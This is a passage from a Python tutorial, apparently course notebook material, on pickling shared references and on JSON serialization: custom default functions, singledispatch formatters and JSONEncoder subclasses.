parrot_id_original = id(parrot_sketch)

Now let's pickle and unpickle this object:

In [48]:
ser = pickle.dumps(fan_favorites)

In [49]:
new_fan_favorites = pickle.loads(ser)

In [50]:
fan_favorites == new_fan_favorites

True

And let's look at the `id` of the parrot_sketch object in our new dictionary compared to the original one:

In [51]:
id(fan_favorites['user_1'][0]), id(new_fan_favorites['user_1'][0])

(4554999848, 4555001288)

As expected the ids differ - but the objects are equal:

In [52]:
fan_favorites['user_1'][0] == new_fan_favorites['user_1'][0]

True

But now let's look at the parrot sketch that is in both `user_1` and `user_2` - remember that originally the objects were identical (`is`):

In [53]:
fan_favorites['user_1'][0] is fan_favorites['user_2'][0]

True

and with our new object:

In [54]:
new_fan_favorites['user_1'][0] is new_fan_favorites['user_2'][0]

True

As you can see the **relative** relationship between objects that were pickled is **preserved**.
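
This also suggests one way around the problem we ran into earlier with separately pickled dictionaries: if two objects need to stay linked, pickle them together in a single call. A minimal sketch, reusing the same `d1` and `d2` values as before:

```python
import pickle

d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}

# Pickle both objects in a single call so pickle sees the shared reference
ser = pickle.dumps((d1, d2))
del d1, d2

d1, d2 = pickle.loads(ser)
d1['c'] = 3
print(d2)             # the change made through d1 shows up in d2['y']
print(d2['y'] is d1)
```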

And that's all I'm really going to say about pickling objects in Python. Instead I'm going to focus more on what is probably a more relevant topic to many of you - JSON serialization/deserialization.

##  JSON Serialization

As we saw in the lecture, JSON is an extremely popular format for data interchange. Unlike pickling it is safe, because JSON data is basically just text. It's human readable too, which is a plus.

There are other formats too, such as XML - but XML does not translate directly to Python dictionaries like JSON does. JSON is a far more natural fit with Python - in fact, when we view the contents of a Python dictionary it reminds us of JSON.

In [1]:
d = {
    "name": {
        "first": "...",
        "last": "..."
    },
    "contact": {
        "phone": [
            {"type": "...", "number": "..."},
            {"type": "...", "number": "..."},
            {"type": "...", "number": "..."},
        ],
        "email": ["...", "...", "..."]
    },
    "address": {
        "line1": "...",
        "line2": "...",
        "city": "...",
        "country": "..."
    }
}

This is a standard Python dictionary, but if you look at the format, it is also technically JSON.

A JSON object contains key/value pairs, nested objects and arrays - just like a Python dictionary. 

The big difference is that JSON is basically just one big string, while a Python dictionary is an object containing other objects.

So the big question when we want to "convert" (serialize) a Python object to JSON is how to **represent** Python objects as **strings**.

Conversely, if we want to load a JSON object into a Python dictionary, how do we "convert" (deserialize) the JSON value strings into a Python object.

By the way this concept of serializing/deserializing is also often called **marshalling**.

JSON has just a few data types it supports:

* **Strings**: must be delimited by double quotes
* **Booleans**: the values `true` and `false`
* **Numbers**: can be integers, or floats (including exponential notation, `1.3E2` for example) - the standard defines a single number type and does not distinguish between integers and floats
* **Arrays**: an **ordered** collection of zero or more items of any valid JSON type
* **Objects**: an **unordered** collection of `key:value` pairs - the keys must be strings (so delimited by double quotes), and the values can be any valid JSON type.
* **NULL**: a null object, denoted by `null` and equivalent to `None` in Python.

This means that the data types supported by JSON are relatively limited - but it turns out, as we'll see later, that it's not really a limitation.
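
As a quick preview of how the types listed above line up with Python values, here is a small sketch using the standard library's `json.dumps` (the sample values are arbitrary):

```python
import json

samples = ['text', True, 10, 1.3E2, [1, 'a', None], {'key': 'value'}, None]

for value in samples:
    # left: the Python type, right: its JSON representation
    print(f'{type(value).__name__:>8} -> {json.dumps(value)}')
```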

Any object can be serialized into a string (think of the `__repr__` method we've used often throughout this course) - in fact, any piece of information in your computer is a series of bits, as are characters - so theoretically any piece of information can be represented using characters. We'll come back to this in a later video. For now, we're going to stick with the basic data types supported by JSON and see what Python provides us for marshalling JSON.

We are going to use the `json` module:

In [2]:
import json

In Python, serializing a dictionary to JSON is done using the `dump` and `dumps` functions - they are just variants of the same thing - `dumps` serializes to a string, while `dump` writes the serialization to a file (or more accurately, a stream).

Similarly, the `load` and `loads` functions are used to deserialize JSON into a dictionary.

Let's see a quick example first:

In [3]:
d1 = {"a": 100, "b": 200}

In [4]:
d1_json = json.dumps(d1)

In [5]:
d1_json, type(d1_json)

('{"a": 100, "b": 200}', str)

By the way, we can obtain a better looking JSON string by specifying an indent for the `dump` or `dumps` functions:

In [6]:
print(json.dumps(d1, indent=2))

{
  "a": 100,
  "b": 200
}


And we can deserialize the JSON string:

In [7]:
d2 = json.loads(d1_json)

In [8]:
d2, type(d2)

({'a': 100, 'b': 200}, dict)

In [9]:
d1 == d2

True

In fact, the original dictionary and the new one are equal.
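
The stream-based variants `dump` and `load` work the same way. In this sketch an `io.StringIO` object stands in for a file opened in text mode, so nothing is written to disk:

```python
import io
import json

d1 = {"a": 100, "b": 200}

# io.StringIO stands in for a real file opened in text mode
stream = io.StringIO()
json.dump(d1, stream)
print(stream.getvalue())

stream.seek(0)  # rewind before reading back
d2 = json.load(stream)
print(d2 == d1)
```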

#### Caveat!

There is a big caveat here. In Python, keys can be any hashable object. But remember that in JSON keys must be strings!

In [10]:
d1 = {1: 100, 2: 200}

In [11]:
d1_json = json.dumps(d1)

In [12]:
d1_json

'{"1": 100, "2": 200}'

Notice how the keys are now strings in the JSON "object". And when we deserialize:

In [13]:
d2 = json.loads(d1_json)

In [14]:
print(d1)
print(d2)

{1: 100, 2: 200}
{'1': 100, '2': 200}


As you can see our keys are now strings! So be careful, it is **not** true in general that `d == loads(dumps(d))`
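
If you know what the keys were supposed to be, you can convert them back yourself after loading. The sketch below assumes every key was originally an `int`. It also shows that some key types, such as tuples, are rejected outright instead of being converted:

```python
import json

d1 = {1: 100, 2: 200}
d2 = json.loads(json.dumps(d1))

# Convert the keys back ourselves - this assumes we know every key is an int
restored = {int(key): value for key, value in d2.items()}
print(restored == d1)

# Keys that are not str, int, float, bool or None raise an exception
try:
    json.dumps({(1, 2): 'tuple key'})
except TypeError as ex:
    print(ex)
```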

Let's just see a few more examples that use the various JSON data types. I'll start with a JSON string this time:

In [15]:
d_json = '''
{
    "name": "John Cleese",
    "age": 82,
    "height": 1.96,
    "walksFunny": true,
    "sketches": [
        {
        "title": "Dead Parrot",
        "costars": ["Michael Palin"]
        },
        {
        "title": "Ministry of Silly Walks",
        "costars": ["Michael Palin", "Terry Jones"]
        }
    ],
    "boring": null    
}
'''

Let's deserialize this JSON string:

In [16]:
d = json.loads(d_json)

In [17]:
print(d)

{'name': 'John Cleese', 'age': 82, 'height': 1.96, 'walksFunny': True, 'sketches': [{'title': 'Dead Parrot', 'costars': ['Michael Palin']}, {'title': 'Ministry of Silly Walks', 'costars': ['Michael Palin', 'Terry Jones']}], 'boring': None}


In [18]:
d

{'name': 'John Cleese',
 'age': 82,
 'height': 1.96,
 'walksFunny': True,
 'sketches': [{'title': 'Dead Parrot', 'costars': ['Michael Palin']},
  {'title': 'Ministry of Silly Walks',
   'costars': ['Michael Palin', 'Terry Jones']}],
 'boring': None}

**Important**: The order of the keys *appears* preserved - but JSON objects are an **unordered** collection, so there is no guarantee of this - do not rely on it.

Let's see the various data types in our dictionary:

In [19]:
print(d['age'], type(d['age']))
print(d['height'], type(d['height']))
print(d['boring'], type(d['boring']))
print(d['sketches'], type(d['sketches']))
print(d['walksFunny'], type(d['walksFunny']))
print(d['sketches'][0], type(d['sketches'][0]))

82 <class 'int'>
1.96 <class 'float'>
None <class 'NoneType'>
[{'title': 'Dead Parrot', 'costars': ['Michael Palin']}, {'title': 'Ministry of Silly Walks', 'costars': ['Michael Palin', 'Terry Jones']}] <class 'list'>
True <class 'bool'>
{'title': 'Dead Parrot', 'costars': ['Michael Palin']} <class 'dict'>


As you can see the JSON `array` was deserialized into a `list`, `true` was deserialized into a `bool`, integer looking values into `int`, float looking values into `float` and sub-objects into `dict`.
So deserializing JSON objects into Python is very straightforward and intuitive.

Let's look at tuples, and see how serializing those works:

In [20]:
d = {'a': (1, 2, 3)}

In [21]:
json.dumps(d)

'{"a": [1, 2, 3]}'

So Python tuples are serialized into JSON arrays - which again means that if we deserialize the JSON we will not get our exact object back:

In [22]:
json.loads(json.dumps(d))

{'a': [1, 2, 3]}

Of course, JSON does not have a notion of tuples as a data type, so this will not work:

In [23]:
bad_json = '''
    {"a": (1, 2, 3)}
'''

In [24]:
json.loads(bad_json)

JSONDecodeError: Expecting value: line 2 column 11 (char 11)

We get a `JSONDecodeError` exception. And that's an exception you'll run across quite a bit as you work with JSON data and Python objects!
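
Since you will run into this exception often, it helps to know that `JSONDecodeError` is a subclass of `ValueError` and carries the error position in its `msg`, `lineno` and `colno` attributes. Here is a minimal sketch of handling it (`try_parse` is a hypothetical helper name):

```python
import json

def try_parse(text):
    # Hypothetical helper: (data, None) on success, (None, message) on failure
    try:
        return json.loads(text), None
    except json.JSONDecodeError as ex:
        return None, f'{ex.msg} at line {ex.lineno}, column {ex.colno}'

print(try_parse('{"a": [1, 2, 3]}'))
print(try_parse('{"a": (1, 2, 3)}'))
```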

So, Python was able to serialize a tuple by making it into a JSON array - but what about other data types - like Decimals, Fractions, Complex Numbers, Sets, etc?

In [25]:
from decimal import Decimal
json.dumps({'a': Decimal('0.5')})

TypeError: Object of type 'Decimal' is not JSON serializable

So `Decimal` objects are not serializable. Let's see the others as well:

In [26]:
try:
    json.dumps({"a": 1+1j})
except TypeError as ex:
    print(ex)

Object of type 'complex' is not JSON serializable


In [27]:
try:
    json.dumps({"a": {1, 2, 3}})
except TypeError as ex:
    print(ex)

Object of type 'set' is not JSON serializable


Now we could get around that problem by looking at the string representation of those objects:

In [28]:
str(Decimal(0.5))

'0.5'

In [29]:
json.dumps({"a": str(Decimal(0.5))})

'{"a": "0.5"}'

But as you can see from the JSON, when we read that data back, we will get the **string** `0.5` back, not even a float!
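
In other words, the round trip only works if whoever reads the JSON knows that this particular string is meant to be a `Decimal` and converts it explicitly. A small sketch of that manual step (variable names are just for illustration):

```python
import json
from decimal import Decimal

original = {'a': Decimal('0.5')}

# Serialize the Decimal as a string, as above
ser = json.dumps({'a': str(original['a'])})

# json.loads gives us back a str - converting it is our responsibility
loaded = json.loads(ser)
print(type(loaded['a']))

restored = {'a': Decimal(loaded['a'])}
print(restored == original)
```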

How about our own objects? As long as they have a string representation we should be fine, or will we?

In [30]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
    
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [31]:
p = Person('John', 82)

In [32]:
p

Person(name=John, age=82)

In [33]:
json.dumps({"john": p})

TypeError: Object of type 'Person' is not JSON serializable

So no luck there either. One approach is to write a custom JSON serializer in our class itself, and use that when we serialize the object:

In [34]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
    
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return dict(name=self.name, age=self.age)

In [35]:
p = Person('John', 82)

In [36]:
p.toJSON()

{'name': 'John', 'age': 82}

And now we can serialize it as follows:

In [37]:
print(json.dumps({"john": p.toJSON()}, indent=2))

{
  "john": {
    "name": "John",
    "age": 82
  }
}


In fact, often we can make our life a little easier by using the `vars` function (or the `__dict__` attribute) to return a dictionary of our object attributes:

In [38]:
vars(p)

{'name': 'John', 'age': 82}

In [39]:
p.__dict__

{'name': 'John', 'age': 82}

In [40]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
    
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return vars(self)

In [41]:
json.dumps(dict(john=p.toJSON()))

'{"john": {"name": "John", "age": 82}}'

How about dealing with sets, where we do not control the class definition:

In [42]:
s = {1, 2, 3}

We can't use the string representation (it has curly braces), and there's nothing else really handy - but we could just convert it to a list:

In [43]:
json.dumps(dict(a=list({1, 2, 3})))

'{"a": [1, 2, 3]}'

There are a couple of glaring issues at this point:
1. we have to remember to call `.toJSON()` for our custom objects
2. what about built-in or standard types like sets, or dates? use built-in or write custom functions to convert and call them every time?

There has to be a better way... !

##  Custom JSON Serialization

As we saw in the previous video, certain data types cannot be serialized to JSON using Python's defaults. 
Here's a simple example of this:

In [1]:
from datetime import datetime

In [2]:
current = datetime.utcnow()

In [3]:
current

datetime.datetime(2018, 12, 29, 22, 26, 35, 671836)

As we can see, this is a `datetime` object.

Now let's try to serialize it to JSON:

In [4]:
import json

In [5]:
json.dumps(current)

TypeError: Object of type 'datetime' is not JSON serializable

As we can see Python raises a `TypeError` exception, stating that `datetime` objects are not JSON serializable.

So, we'll need to come up with our own serialization format.

For datetimes, the most common format is the **ISO 8601** format - you can read up more about it here (https://en.wikipedia.org/wiki/ISO_8601), but basically the format is:

*YYYY-MM-DD* **T** *HH:MM:SS*

There are some variations for encoding timezones, but to keep things simple I am going to use timezone naive timestamps, and just use UTC everywhere.

We could use Python's string representation for datetimes:

In [6]:
str(current)

'2018-12-29 22:26:35.671836'

but this is not quite ISO-8601. We could write a custom formatter ourselves:

In [7]:
def format_iso(dt):
    return dt.strftime('%Y-%m-%dT%H:%M:%S')

(If you want more info and options on date and time formatting/parsing using `strftime` and `strptime`, which essentially pass through to their `C` counterparts, you can see the Python docs here: https://docs.python.org/3/library/datetime.html#strftime-strptime-behavior)

In [8]:
format_iso(current)

'2018-12-29T22:26:35'

But Python actually provides us a function to do the same:

In [9]:
current.isoformat()

'2018-12-29T22:26:35.671836'

This is almost identical to our custom representation, but also includes fractional seconds. If you don't want fractional seconds in your representation, you can either pass `timespec='seconds'` to `isoformat` (available since Python 3.6) or write some custom code like the one above.

I'm just going to use Python's default ISO-8601 representation.
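
For reference, here is a short sketch of the `isoformat` options using a fixed timestamp, so the results are reproducible. It also shows `datetime.fromisoformat` (Python 3.7+), which parses the string back into a `datetime`:

```python
from datetime import datetime

dt = datetime(2018, 12, 29, 22, 26, 35, 671836)

full = dt.isoformat()                        # includes microseconds
no_fraction = dt.isoformat(timespec='seconds')  # whole seconds only
print(full)
print(no_fraction)

# fromisoformat parses the output of isoformat back into a datetime
print(datetime.fromisoformat(full) == dt)
```
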
And now let's serialize our `datetime` object to JSON:

In [10]:
log_record = {'time': datetime.utcnow().isoformat(), 'message': 'testing'}

In [11]:
json.dumps(log_record)

'{"time": "2018-12-29T22:26:42.083020", "message": "testing"}'

OK, this works, but this is far from ideal. Normally, our dictionary will contain the `datetime` object, not its string representation.

For example, in the example I showed above, our record would likely be:

In [12]:
log_record = {'time': datetime.utcnow(), 'message': 'testing'}

The problem is that `log_record` is now not JSON serializable!

What we have to do is write custom code to replace non-JSON serializable objects in our dictionary with custom representations. This can quickly become tedious and unmanageable if we deal with many dictionaries, and arbitrary structures.

Fortunately, Python's `dump` and `dumps` functions have some ways for us to define general serializations for non-standard JSON objects.

The simplest way is to specify a function that `dump`/`dumps` will call when it encounters something it cannot serialize:

In [13]:
def format_iso(dt):
    return dt.isoformat()

In [14]:
json.dumps(log_record, default=format_iso)

'{"time": "2018-12-29T22:26:42.532485", "message": "testing"}'

This will work even if we have more than one date in our dictionary:

In [15]:
log_record = {
    'time1': datetime.utcnow(),
    'time2': datetime.utcnow(),
    'message': 'Testing...'
}

In [16]:
json.dumps(log_record, default=format_iso)

'{"time1": "2018-12-29T22:26:43.296170", "time2": "2018-12-29T22:26:43.296171", "message": "Testing..."}'

So this works, but what happens if we introduce another non-serializable object:

In [17]:
log_record = {
    'time': datetime.utcnow(),
    'message': 'Testing...',
    'other': {'a', 'b', 'c'}
}

In [18]:
json.dumps(log_record, default=format_iso)

AttributeError: 'set' object has no attribute 'isoformat'

As you can see, Python encountered that `set`, and therefore called the `default` callable - but that callable was not designed to handle sets, and so we end up with an exception in the `format_iso` callable instead.

We can remedy this by adding code to our function so that it handles various data types, essentially creating a dispatcher. This should remind you of the single-dispatch generic function decorator available in the `functools` module, which we discussed in an earlier part of this series. You can also view more info about it here: https://docs.python.org/3/library/functools.html#functools.singledispatch


Let's first write it without the decorator to make sure we have our code correct:

In [19]:
def custom_json_formatter(arg):
    if isinstance(arg, datetime):
        return arg.isoformat()
    elif isinstance(arg, set):
        return list(arg)

In [20]:
json.dumps(log_record, default=custom_json_formatter)

'{"time": "2018-12-29T22:26:43.760863", "message": "Testing...", "other": ["c", "a", "b"]}'
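One caveat with a formatter written this way: for a type it does not handle, the function falls off the end and implicitly returns `None`, which `dumps` then encodes as `null`. A minimal sketch of the difference, assuming we would rather get an exception (the names `lenient_formatter` and `strict_formatter` are hypothetical):

```python
import json
from datetime import datetime

def lenient_formatter(arg):
    # same shape as the formatter above: unhandled types fall through,
    # so the function implicitly returns None
    if isinstance(arg, datetime):
        return arg.isoformat()
    elif isinstance(arg, set):
        return list(arg)

def strict_formatter(arg):
    # hypothetical stricter variant: refuse anything we do not recognize
    if isinstance(arg, datetime):
        return arg.isoformat()
    elif isinstance(arg, set):
        return list(arg)
    raise TypeError(
        f'Object of type {type(arg).__name__} is not JSON serializable'
    )

data = {'value': 1 + 1j}

# the complex number silently becomes null
lenient_result = json.dumps(data, default=lenient_formatter)
print(lenient_result)

try:
    json.dumps(data, default=strict_formatter)
except TypeError as ex:
    strict_error = str(ex)
    print(strict_error)
```

Which behavior is preferable depends on the application, but a silent `null` is easy to miss when the data is read back later.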

To make things a little more interesting, let's throw in a custom object as well:

In [21]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return {
            'name': self.name,
            'age': self.age,
            'create_dt': self.create_dt.isoformat()
        }

In [22]:
p = Person('John', 82)
print(p)
print(p.toJSON())

Person(name=John, age=82)
{'name': 'John', 'age': 82, 'create_dt': '2018-12-29T22:26:45.066252'}


And we modify our custom JSON formatter as follows:

In [23]:
def custom_json_formatter(arg):
    if isinstance(arg, datetime):
        return arg.isoformat()
    elif isinstance(arg, set):
        return list(arg)
    elif isinstance(arg, Person):
        return arg.toJSON()

We can now serialize a more complex object:

In [24]:
log_record = dict(time=datetime.utcnow(),
                  message='Created new person record',
                  person=p)

In [25]:
json.dumps(log_record, default=custom_json_formatter)

'{"time": "2018-12-29T22:26:45.769929", "message": "Created new person record", "person": {"name": "John", "age": 82, "create_dt": "2018-12-29T22:26:45.066252"}}'

In [26]:
print(json.dumps(log_record, default=custom_json_formatter, indent=2))

{
  "time": "2018-12-29T22:26:45.769929",
  "message": "Created new person record",
  "person": {
    "name": "John",
    "age": 82,
    "create_dt": "2018-12-29T22:26:45.066252"
  }
}


One thing to note here is that for the `Person` class we returned a formatted string for the `create_dt` attribute. We don't actually need to do this - we can simply return a `datetime` object and let `custom_json_formatter` handle serializing the `datetime` object:

In [27]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return {
            'name': self.name,
            'age': self.age,
            'create_dt': self.create_dt
        }

In [28]:
p = Person('Monty', 100)

In [29]:
log_record = dict(time=datetime.utcnow(),
                  message='Created new person record',
                  person=p)

In [30]:
print(json.dumps(log_record, default=custom_json_formatter, indent=2))

{
  "time": "2018-12-29T22:26:47.029102",
  "message": "Created new person record",
  "person": {
    "name": "Monty",
    "age": 100,
    "create_dt": "2018-12-29T22:26:46.749022"
  }
}


In fact, we could simplify our class further by simply returning a dict of the attributes, since in this case we want to serialize everything as is.

But using the `toJSON` callable means we can customize exactly how we want our objects to be serialized.

So, if we weren't particular about the serialization we could do this:

In [31]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return vars(self)

In [32]:
p = Person('Python', 27)

In [33]:
p.toJSON()

{'name': 'Python',
 'age': 27,
 'create_dt': datetime.datetime(2018, 12, 29, 22, 26, 47, 973930)}

In [34]:
log_record['person'] = p
print(log_record)

{'time': datetime.datetime(2018, 12, 29, 22, 26, 47, 29102), 'message': 'Created new person record', 'person': Person(name=Python, age=27)}


In [35]:
print(json.dumps(log_record, default=custom_json_formatter, indent=2))

{
  "time": "2018-12-29T22:26:47.029102",
  "message": "Created new person record",
  "person": {
    "name": "Python",
    "age": 27,
    "create_dt": "2018-12-29T22:26:47.973930"
  }
}


In fact, we could use this approach in our custom formatter - if an object does not have a `toJSON` callable, we'll just use a dictionary of its attributes, if it has any. It might not (a complex number or a set, for example), so we need to watch out for that as well.

In [36]:
'toJSON' in vars(Person)

True

In [37]:
def custom_json_formatter(arg):
    if isinstance(arg, datetime):
        return arg.isoformat()
    elif isinstance(arg, set):
        return list(arg)
    else:
        try:
            return arg.toJSON()
        except AttributeError:
            try:
                return vars(arg)
            except TypeError:
                return str(arg)

Let's create another custom class that does not have a `toJSON` method:

In [38]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'Point(x={self.x}, y={self.y})'

In [39]:
pt1 = Point(10, 10)

In [40]:
vars(pt1)

{'x': 10, 'y': 10}

In [41]:
log_record = dict(time=datetime.utcnow(),
                  message='Created new point',
                  point=pt1,
                  created_by=p)

In [42]:
log_record

{'time': datetime.datetime(2018, 12, 29, 22, 26, 50, 955039),
 'message': 'Created new point',
 'point': Point(x=10, y=10),
 'created_by': Person(name=Python, age=27)}

And we can now serialize it to JSON:

In [43]:
print(json.dumps(log_record, default=custom_json_formatter, indent=2))

{
  "time": "2018-12-29T22:26:50.955039",
  "message": "Created new point",
  "point": {
    "x": 10,
    "y": 10
  },
  "created_by": {
    "name": "Python",
    "age": 27,
    "create_dt": "2018-12-29T22:26:47.973930"
  }
}


So now, let's re-write our custom json formatter using the generic single dispatch decorator I mentioned earlier:

In [44]:
from functools import singledispatch

Our default approach is going to first try to use `toJSON`; if that fails it will try to use `vars`, and if that still fails we'll use the string representation, whatever that happens to be:

In [45]:
@singledispatch
def json_format(arg):
    print(arg)
    try:
        print('\ttrying to use toJSON...')
        return arg.toJSON()
    except AttributeError:
        print('\tfailed - trying to use vars...')
        try:
            return vars(arg)
        except TypeError:
            print('\tfailed - using string representation...')
            return str(arg)

And now we 'register' other data types:

In [46]:
@json_format.register(datetime)
def _(arg):
    return arg.isoformat()

In [47]:
@json_format.register(set)
def _(arg):
    return list(arg)

And we can now serialize just like before:

In [48]:
print(json.dumps(log_record, default=json_format, indent=2))

Point(x=10, y=10)
	trying to use toJSON...
	failed - trying to use vars...
Person(name=Python, age=27)
	trying to use toJSON...
{
  "time": "2018-12-29T22:26:50.955039",
  "message": "Created new point",
  "point": {
    "x": 10,
    "y": 10
  },
  "created_by": {
    "name": "Python",
    "age": 27,
    "create_dt": "2018-12-29T22:26:47.973930"
  }
}
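If you are ever unsure which implementation will handle a given type, a single-dispatch generic function has a `dispatch` method that returns it. A small self-contained sketch, using a simplified and hypothetical `to_json` function rather than the `json_format` function above:

```python
from datetime import datetime
from functools import singledispatch

@singledispatch
def to_json(arg):
    # fallback used for any type without a registered implementation
    return str(arg)

@to_json.register(datetime)
def _(arg):
    return arg.isoformat()

@to_json.register(set)
def _(arg):
    return list(arg)

# dispatch() returns the function that would be called for a given type
fallback = to_json.dispatch(object)
datetime_handler = to_json.dispatch(datetime)
complex_handler = to_json.dispatch(complex)

print(complex_handler is fallback)   # complex is not registered
print(datetime_handler is fallback)  # datetime has its own implementation
```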


Let's change our Person class to emit some custom JSON instead of just using `vars`:

In [49]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def toJSON(self):
        return dict(name=self.name)

In [50]:
p = Person('Python', 27)

In [51]:
log_record['created_by'] = p

In [52]:
print(json.dumps(log_record, default=json_format, indent=2))

Point(x=10, y=10)
	trying to use toJSON...
	failed - trying to use vars...
Person(name=Python, age=27)
	trying to use toJSON...
{
  "time": "2018-12-29T22:26:50.955039",
  "message": "Created new point",
  "point": {
    "x": 10,
    "y": 10
  },
  "created_by": {
    "name": "Python"
  }
}


The way we wrote our default formatter means that we can now also serialize other, unexpected data types, using each object's string representation. If that's not acceptable, we can either not do this and let a `TypeError` exception get raised, or register more custom formatters:

In [53]:
from decimal import Decimal
from fractions import Fraction

json.dumps(dict(a=1+1j, 
                b=Decimal('0.5'), 
                c=Fraction(1, 3),
                p=Person('Python', 27),
                pt=Point(0,0),
                time=datetime.utcnow()
               ), 
           default=json_format)

(1+1j)
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
0.5
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
1/3
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
Person(name=Python, age=27)
	trying to use toJSON...
Point(x=0, y=0)
	trying to use toJSON...
	failed - trying to use vars...


'{"a": "(1+1j)", "b": "0.5", "c": "1/3", "p": {"name": "Python"}, "pt": {"x": 0, "y": 0}, "time": "2018-12-29T22:26:54.860340"}'

Now, suppose we don't want that default representation for `Decimal` objects - we want to serialize them in this form: `Decimal(0.5)`.

All we need to do is to register a new function to serialize `Decimal` types:

In [54]:
@json_format.register(Decimal)
def _(arg):
    return f'Decimal({str(arg)})'

In [55]:
json.dumps(dict(a=1+1j, 
                b=Decimal('0.5'),
                c=Fraction(1, 3),
                p=Person('Python', 27),
                pt = Point(0,0),
                time = datetime.utcnow()
               ), 
           default=json_format)

(1+1j)
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
1/3
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
Person(name=Python, age=27)
	trying to use toJSON...
Point(x=0, y=0)
	trying to use toJSON...
	failed - trying to use vars...


'{"a": "(1+1j)", "b": "Decimal(0.5)", "c": "1/3", "p": {"name": "Python"}, "pt": {"x": 0, "y": 0}, "time": "2018-12-29T22:26:55.491606"}'

One last example that clearly shows the `json_format` function gets called recursively when needed:

In [56]:
print(json.dumps(dict(pt = Point(Person('Python', 27), 2+2j)),
          default=json_format, indent=2))

Point(x=Person(name=Python, age=27), y=(2+2j))
	trying to use toJSON...
	failed - trying to use vars...
Person(name=Python, age=27)
	trying to use toJSON...
(2+2j)
	trying to use toJSON...
	failed - trying to use vars...
	failed - using string representation...
{
  "pt": {
    "x": {
      "name": "Python"
    },
    "y": "(2+2j)"
  }
}


##  Custom JSON Encoding using JSONEncoder

In the previous video, we saw how we were able to provide custom encodings using the `default` argument of the `dump`/`dumps` function.

But how does Python know how to encode the "standard" types, such as `str`, `int`, `float`, `list`, `dict`, etc?

It uses a special class - `JSONEncoder`.

This class supports the following encodings (see Python docs: https://docs.python.org/3/library/json.html#json.JSONEncoder)

|Python |JSON  |
|:----|:---|
| `dict` | object `{...}`|
| `list`, `tuple` | array `[...]` |
| `str`  | string `"..."`|
| `int`, `float` | number |
| `int` or `float` `Enums` | number |
| `bool` | `true` or `false` |
| `None` | `null` |

Anything beyond those Python types and we end up with a `TypeError` exception.
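As a quick check of the table above, here is a small sketch that pushes one value of each supported kind through `dumps`. The `Color` enumeration and the dictionary keys are made up for this illustration:

```python
import json
from enum import IntEnum

class Color(IntEnum):
    RED = 1

data = {
    'dict': {'k': 1},
    'list': [1, 2],
    'tuple': (1, 2),      # tuples become JSON arrays, just like lists
    'str': 'a',
    'int': 1,
    'float': 1.5,
    'enum': Color.RED,    # int-based Enum members become plain numbers
    'bool': True,
    'none': None,
}

encoded = json.dumps(data)
print(encoded)

# decoding gives back lists and plain ints: the tuple and the Enum
# information is not preserved in the JSON text
decoded = json.loads(encoded)
print(decoded)
```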

We can see how this class encodes objects by creating an instance and calling its `encode` method directly:

In [1]:
import json

default_encoder = json.JSONEncoder()
default_encoder.encode([1, 2, 3])

'[1, 2, 3]'

And for non-supported objects:

In [2]:
default_encoder.encode(1+1j)

TypeError: Object of type 'complex' is not JSON serializable

We can actually extend this `JSONEncoder` class and override the `default` method. We can then add in support for whatever type we want to use, and pass any other types to the parent class to handle (either serialize the data or raise a `TypeError` exception). 

Let's just see a simple example first:

In [3]:
import json
from datetime import datetime

class CustomJSONEncoder(json.JSONEncoder):
    def default(self, arg):
        if isinstance(arg, datetime):
            return arg.isoformat()
        else:
            return super().default(arg)

In [4]:
custom_encoder = CustomJSONEncoder()

In [5]:
custom_encoder.encode(True)

'true'

In [6]:
custom_encoder.encode(datetime.utcnow())

'"2018-12-29T22:27:19.863377"'

And we can now use this custom encoder by specifying it when we use `dump`/`dumps`:

In [7]:
json.dumps(dict(name='test', time=datetime.utcnow()), cls=CustomJSONEncoder)

'{"name": "test", "time": "2018-12-29T22:27:20.135841"}'

One thing to note is that for both the `default` approach and the `cls` approach, our function / encoder will only be called for types that Python cannot already serialize on its own. For the types it does know how to serialize (strings, integers, lists, etc.), our code never gets called.

In [8]:
def custom_encoder(arg):
    print('Custom encoder called...')
    if isinstance(arg, str):
        return f'some string: {arg}'

Here we want to "override" `dumps` default encoding behavior for strings:

In [9]:
json.dumps({'name': 'Python'}, default=custom_encoder)

'{"name": "Python"}'

As you can see, we cannot do that - because the argument is a "recognized" type (`str`), Python does not even call our `custom_encoder` function.

And the same happens when we override the `default` method in our custom `JSONEncoder` class.
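A minimal sketch of that second case, assuming a throwaway encoder class (`RecordingEncoder` and the `seen` list are hypothetical names) whose `default` method records every argument it receives:

```python
import json

seen = []

class RecordingEncoder(json.JSONEncoder):
    def default(self, arg):
        # only reached for objects the base encoder cannot handle
        seen.append(arg)
        return str(arg)

plain = json.dumps({'name': 'Python'}, cls=RecordingEncoder)
seen_after_plain = list(seen)

with_complex = json.dumps({'value': 1 + 1j}, cls=RecordingEncoder)

print(plain, seen_after_plain)
print(with_complex, seen)
```

The string never reaches `default`, while the complex number does.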

Let's look at the signature for `dumps`:

In [10]:
help(json.dumps)

Help on function dumps in module json:

dumps(obj, *, skipkeys=False, ensure_ascii=True, check_circular=True, allow_nan=True, cls=None, indent=None, separators=None, default=None, sort_keys=False, **kw)
    Serialize ``obj`` to a JSON formatted ``str``.
    
